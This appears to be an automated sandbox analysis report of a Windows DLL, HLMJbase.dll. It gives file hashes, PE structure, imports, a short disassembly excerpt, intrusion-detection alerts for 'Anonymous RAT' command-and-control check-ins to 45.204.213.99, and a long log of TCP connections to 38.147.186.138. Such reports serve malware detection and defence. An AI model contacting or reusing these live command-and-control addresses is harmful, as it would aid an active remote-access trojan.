                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.3.2.9.0.2.8.6.9.4.5.5.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.3.2.9.0.2.9.1.3.2.0.6.2.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.b.f.c.7.3.a.-.d.9.f.4.-.4.9.6.f.-.8.3.2.b.-.e.e.d.d.7.e.9.b.6.1.7.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.d.6.4.c.9.f.-.9.a.8.9.-.4.0.4.a.-.8.b.c.4.-.8.0.a.f.4.4.5.3.b.0.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.7.8.-.0.0.0.1.-.0.0.1.4.-.0.7.1.6.-.f.9.e.0.4.9.5.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Mini DuMP crash report, 14 streams, Sun Dec 22 08:17:08 2024, 0x1205a4 type
                      Category:dropped
                      Size (bytes):75720
                      Entropy (8bit):2.0233124277944463
                      Encrypted:false
                      SSDEEP:192:zRRL3A40KR6RVDO5H4acGHI7NAp/fN62BUcC7Gq690a0+aVc7nh:PLp066+5H7cGUNAlU2wq91laOD
                      MD5:A74941B7A2016CC13F08FAD19D827336
                      SHA1:6BDC08FBDF4049D5A8CC59351B9DDE690B0AFBC6
                      SHA-256:75ECFDF8330168C146AF2DA524486BBBB86193082855401C78A496395071B354
                      SHA-512:41470734AC2D76C6C418C1FF5A0610667C725B92593688C0B863F0B71F94DE1D2E3C28B64E653134A27EA9833EFE8C08DDA257CB24E52DFC8917262629795F3A
                      Malicious:false
                      Reputation:low
                      Preview:MDMP..a..... .........gg............$...............,............<..........T.......8...........T...........87..............< ..........("..............................................................................eJ......."......GenuineIntel............T.......x.....gg.............................0..=...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):8324
                      Entropy (8bit):3.6877150044910167
                      Encrypted:false
                      SSDEEP:192:R6l7wVeJH66hz6YFs6aSggmf8qJ4pD089b7Vsfapm:R6lXJa616Yu6hggmf8qJU7uf9
                      MD5:584F7909D8224999A20696B69ED7E313
                      SHA1:63C790A919EE470E748A04DBBCBF98966F0C6E51
                      SHA-256:0A4532FB624B8A5D978A4911AA84C50E06B2BB2F0CCBC8BA19F297F29EA000A0
                      SHA-512:3C87F213C6131B9E5AE3E047BE10FB775119EBC0CA29DE7A682361A247B531F9C0E36763F7637346AF9AC9D0B51FCDFA9CC1019289E61935FFE3DC9C3220BDF5
                      Malicious:false
                      Reputation:low
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.4.4.<./.P.i.
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4747
                      Entropy (8bit):4.448967898641122
                      Encrypted:false
                      SSDEEP:48:cvIwWl8zs3Jg77aI9tSWpW8VYUYm8M4JCdPRaFbgTK+q8vjPRHTnGScS2d:uIjfZI7/z7VQJqxTKKVHLJ32d
                      MD5:32327A2D81FE8A4FDBA7FAA4A0A7ADDD
                      SHA1:D9E3A794C4A011F36FA21554C5C59963CC7E06B3
                      SHA-256:9D233A2340E090E5ECEFAD25AAE1A446A3EDA2FC77F5860C1393A4CDCA550B6F
                      SHA-512:A2A57F05B5F3BF2CDC7F362FEDBA86D517A8658D9770BA99C40360853F4528A4D4E2584739DEFE2E56A7BD5D28A7E6692F20F2864804F9355F7F70491E085248
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="642199" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:MS Windows registry file, NT/2000 or above
                      Category:dropped
                      Size (bytes):1835008
                      Entropy (8bit):4.466244345882531
                      Encrypted:false
                      SSDEEP:6144:8IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSbG:BXD94+WlLZMM6YFHT+G
                      MD5:4D37F2AE668ECB47168EA7E67429A772
                      SHA1:1F912C9BC72943087DE5CF9C7FF53C7F0FD1A28F
                      SHA-256:3BD8D4F308233B5425251BFB7EA4B4D9F8753E6ABA2076EE983735EF186F0FF2
                      SHA-512:20CEC200E5CC55D601B77FC51D0A8FEF288E6C663E673BF248E180797ED15ED27081C7AA5F427F8CD9A5C3337927DDBD78C2F600DBB07E822B71E6CEE3B81C17
                      Malicious:false
                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....IT..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.62577478877575
                      TrID:
                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                      • Generic Win/DOS Executable (2004/3) 0.20%
                      • DOS Executable Generic (2002/1) 0.20%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:HLMJbase.dll
                      File size:1'071'104 bytes
                      MD5:250eb1ef1645f13252ef13c14ba66d51
                      SHA1:4aa14d113af1d74fbd1adbc16c10126b69878d0b
                      SHA256:dacdac1e333a1f45700e3707e617ff49c457226604f1ffa160fc3faf9b6810b3
                      SHA512:e8afc0d6c8c089a8cb1802e21a115961941951ef40d6d553f41980a0c40f9a0644220ba9c55623711f8928e1d47723e9f3d896bcce3806d181d509318ac78f6b
                      SSDEEP:24576:X8vRHK4uhXIAnszgnvuscGteHwoXilrEAfTo:V4rewws0rfc
                      TLSH:BB35AE40EAD3C5BBDD4F2474642FF33FDB32560A8338D693EBE42DB5A86A361541A106
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u...u...u.......u..mt...u..mv...u..mq...u..mp...u.&.t...u...t.a.u...u...u.`mu...u.`mw...u.Rich..u........................
                      Icon Hash:7ae282899bbab082
                      Entrypoint:0x100a12e9
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x10000000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x67642B1D [Thu Dec 19 14:18:05 2024 UTC]
                      TLS Callbacks:0x10088fa0
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:5a379389d798d294fb7ce19042f3dcf5
                      Instruction
                      push ebp
                      mov ebp, esp
                      cmp dword ptr [ebp+0Ch], 01h
                      jne 00007F59A0DE2577h
                      call 00007F59A0DE25D7h
                      push dword ptr [ebp+10h]
                      push dword ptr [ebp+0Ch]
                      push dword ptr [ebp+08h]
                      call 00007F59A0DE2423h
                      add esp, 0Ch
                      pop ebp
                      retn 000Ch
                      push ebp
                      mov ebp, esp
                      sub esp, 14h
                      lea eax, dword ptr [ebp-0Ch]
                      xorps xmm0, xmm0
                      push eax
                      movlpd qword ptr [ebp-0Ch], xmm0
                      call dword ptr [100A60C0h]
                      mov eax, dword ptr [ebp-08h]
                      xor eax, dword ptr [ebp-0Ch]
                      mov dword ptr [ebp-04h], eax
                      call dword ptr [100A60CCh]
                      xor dword ptr [ebp-04h], eax
                      call dword ptr [100A611Ch]
                      xor dword ptr [ebp-04h], eax
                      lea eax, dword ptr [ebp-14h]
                      push eax
                      call dword ptr [100A6148h]
                      mov eax, dword ptr [ebp-10h]
                      lea ecx, dword ptr [ebp-04h]
                      xor eax, dword ptr [ebp-14h]
                      xor eax, dword ptr [ebp-04h]
                      xor eax, ecx
                      leave
                      ret
                      mov ecx, dword ptr [10102040h]
                      push esi
                      push edi
                      mov edi, BB40E64Eh
                      mov esi, FFFF0000h
                      cmp ecx, edi
                      je 00007F59A0DE2576h
                      test esi, ecx
                      jne 00007F59A0DE2598h
                      call 00007F59A0DE2509h
                      mov ecx, eax
                      cmp ecx, edi
                      jne 00007F59A0DE2579h
                      mov ecx, BB40E64Fh
                      jmp 00007F59A0DE2580h
                      test esi, ecx
                      jne 00007F59A0DE257Ch
                      or eax, 00004711h
                      shl eax, 10h
                      or ecx, eax
                      mov dword ptr [10102040h], ecx
                      not ecx
                      pop edi
                      mov dword ptr [10102080h], ecx
                      pop esi
                      ret
                      push ebp
                      mov ebp, esp
                      cmp dword ptr [ebp+0Ch], 01h
                      jne 00007F59A0DE2584h
                      cmp dword ptr [0000F88Ch], 00000000h
                      Programming Language:
                      • [IMP] VS2008 SP1 build 30729
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x100a800x54.rdata
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x100ad40xdc.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1030000x4d0c.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0xff9580x54.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0xff9c00x18.rdata
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xff8980x40.rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0xa60000x20c.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000xa48330xa4a009db27373bcf74384313548cdff739b89False0.5883815015186029data6.520667142363245IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0xa60000x5b80e0x5ba00b940f5bdafb172ca49d82aa5efc8081cFalse0.5340211459754434data6.20745028003892IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x1020000x4d80x2008917dd775708aa9b2d3e4f127fc8a4f9False0.119140625data0.6084715227586681IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .reloc0x1030000x4d0c0x4e00cc372a90e2aea2d045cbc1a9ae8ecd34False0.7442407852564102data6.595328231641845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      DLLImport
                      bcryptprimitives.dllProcessPrng
                      api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressSingle, WakeByAddressAll
                      kernel32.dllSwitchToThread, SetUnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, InitializeSListHead, HeapReAlloc, HeapFree, Sleep, DisableThreadLibraryCalls, GetSystemTimeAsFileTime, GetModuleHandleW, WaitForSingleObject, GetCurrentThreadId, SetWaitableTimer, GetModuleHandleA, GetFinalPathNameByHandleW, SetLastError, GetQueuedCompletionStatusEx, SetHandleInformation, CreateIoCompletionPort, FreeLibrary, GetCurrentProcess, GetStdHandle, GetConsoleMode, GetProcAddress, MultiByteToWideChar, WriteConsoleW, QueryPerformanceFrequency, FormatMessageW, WaitForSingleObjectEx, LoadLibraryA, lstrlenW, GetCurrentProcessId, CreateMutexA, ReleaseMutex, GetEnvironmentVariableW, GetLastError, LoadLibraryExW, SetThreadErrorMode, CloseHandle, CreateThread, SetThreadStackGuarantee, GetCurrentThread, QueryPerformanceCounter, HeapAlloc, GetProcessHeap, GetCurrentDirectoryW, RtlCaptureContext, WideCharToMultiByte, PostQueuedCompletionStatus, UnhandledExceptionFilter, CreateWaitableTimerExW, SetFileCompletionNotificationModes, TerminateProcess
                      ws2_32.dllWSACleanup, WSASend, bind, connect, setsockopt, WSAStartup, getaddrinfo, getsockopt, recv, send, getpeername, freeaddrinfo, closesocket, WSAIoctl, ioctlsocket, WSASocketW, getsockname, WSAGetLastError, shutdown
                      ntdll.dllRtlNtStatusToDosError, NtDeviceIoControlFile, NtCreateFile, NtWriteFile, NtCancelIoFileEx
                      secur32.dllEncryptMessage, FreeCredentialsHandle, DeleteSecurityContext, DecryptMessage, ApplyControlToken, FreeContextBuffer, QueryContextAttributesW, AcquireCredentialsHandleA, InitializeSecurityContextW, AcceptSecurityContext
                      advapi32.dllRegOpenKeyExW, RegCloseKey, RegQueryValueExW
                      crypt32.dllCertFreeCertificateChain, CertEnumCertificatesInStore, CertAddCertificateContextToStore, CertDuplicateStore, CertCloseStore, CertDuplicateCertificateChain, CertOpenStore, CertDuplicateCertificateContext, CertVerifyCertificateChainPolicy, CertGetCertificateChain, CertFreeCertificateContext
                      VCRUNTIME140.dll_except_handler4_common, __CxxFrameHandler3, memcmp, memmove, memcpy, memset, __std_type_info_destroy_list
                      api-ms-win-crt-runtime-l1-1-0.dll_seh_filter_dll, _initterm_e, _initialize_narrow_environment, _initialize_onexit_table, _initterm, _execute_onexit_table, _configure_narrow_argv, _cexit
                      NameOrdinalAddress
                      NvOptimusEnablement10x100038c8
                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-12-22T09:17:11.577682+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.44973945.204.213.997677TCP
                      2024-12-22T09:18:23.960106+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.44974645.204.213.997677TCP
                      2024-12-22T09:19:34.451747+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.44993345.204.213.997688TCP
                      2024-12-22T09:20:58.342264+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.45003045.204.213.997677TCP
                      TimestampSource PortDest PortSource IPDest IP
                      Dec 22, 2024 09:17:03.658704996 CET49732443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:03.658791065 CET4434973238.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:03.658881903 CET49732443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:03.659013033 CET49733443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:03.659066916 CET4434973338.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:03.659127951 CET49733443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:03.675143957 CET49733443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:03.675167084 CET4434973338.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:03.675173998 CET49732443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:03.675205946 CET4434973238.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:05.327730894 CET4434973238.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:05.327824116 CET49732443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:05.430753946 CET49732443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:05.430808067 CET4434973238.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:05.431837082 CET4434973238.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:05.472234964 CET49732443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:05.510350943 CET4434973338.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:05.510478973 CET49733443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:05.515652895 CET49733443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:05.515671015 CET4434973338.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:05.515883923 CET4434973338.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:05.567431927 CET49733443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:05.620558023 CET49733443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:05.663341999 CET4434973338.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:05.694654942 CET49732443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:05.735366106 CET4434973238.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.227857113 CET4434973238.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.228009939 CET4434973238.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.228106976 CET49732443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.235279083 CET49732443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.235340118 CET4434973238.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.235423088 CET49732443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.235440016 CET4434973238.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.251718998 CET4434973338.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.251770973 CET4434973338.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.251818895 CET49733443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.252300978 CET49733443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.252317905 CET4434973338.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.259375095 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.259422064 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.259509087 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.260176897 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.260205984 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.276542902 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.276576042 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.276648998 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.277888060 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.277906895 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.309756994 CET49736443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.309806108 CET4434973638.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:06.309895039 CET49736443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.318470955 CET49736443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:06.318491936 CET4434973638.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:07.889580965 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:07.889713049 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:07.891984940 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:07.892015934 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:07.892385960 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:07.893027067 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:07.919440985 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:07.919555902 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:07.929615974 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:07.929644108 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:07.930032969 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:07.935384989 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:07.945437908 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:07.946738005 CET4434973638.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:07.946844101 CET49736443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:07.982497931 CET49736443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:07.982546091 CET4434973638.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:07.983683109 CET4434973638.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:07.991377115 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.039031982 CET49736443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.201181889 CET49736443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.243376017 CET4434973638.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.723134995 CET4434973638.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.723309040 CET4434973638.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.723376989 CET49736443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.724384069 CET49736443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.724419117 CET4434973638.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.738982916 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.739037991 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.739099979 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.739120007 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.739177942 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.739212990 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.739212990 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.739243984 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.759191990 CET49737443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.759231091 CET4434973738.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.759326935 CET49737443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.770962000 CET49737443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.770977974 CET4434973738.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.771723032 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.771749973 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.771779060 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.771817923 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.771842957 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.771862030 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.771902084 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.863954067 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.864016056 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.864042044 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.864064932 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.864101887 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.864124060 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.898746014 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.898770094 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.898845911 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.898861885 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.898907900 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.949107885 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.949167013 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.949199915 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.949224949 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.949290991 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.949316978 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.984360933 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.984385014 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.984595060 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:08.984610081 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:08.984671116 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:09.245378017 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:09.245402098 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:09.245551109 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:09.245706081 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:09.245754957 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:09.245820999 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:09.365907907 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:09.365921974 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:09.366106033 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:09.366115093 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:09.366137028 CET4434973538.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:09.366173983 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:09.366197109 CET49735443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:09.366580009 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:09.366626978 CET4434973438.147.186.138192.168.2.4
                      Dec 22, 2024 09:17:09.366676092 CET49734443192.168.2.438.147.186.138
                      Dec 22, 2024 09:17:09.366705894 CET4434973438.147.186.138192.168.2.4
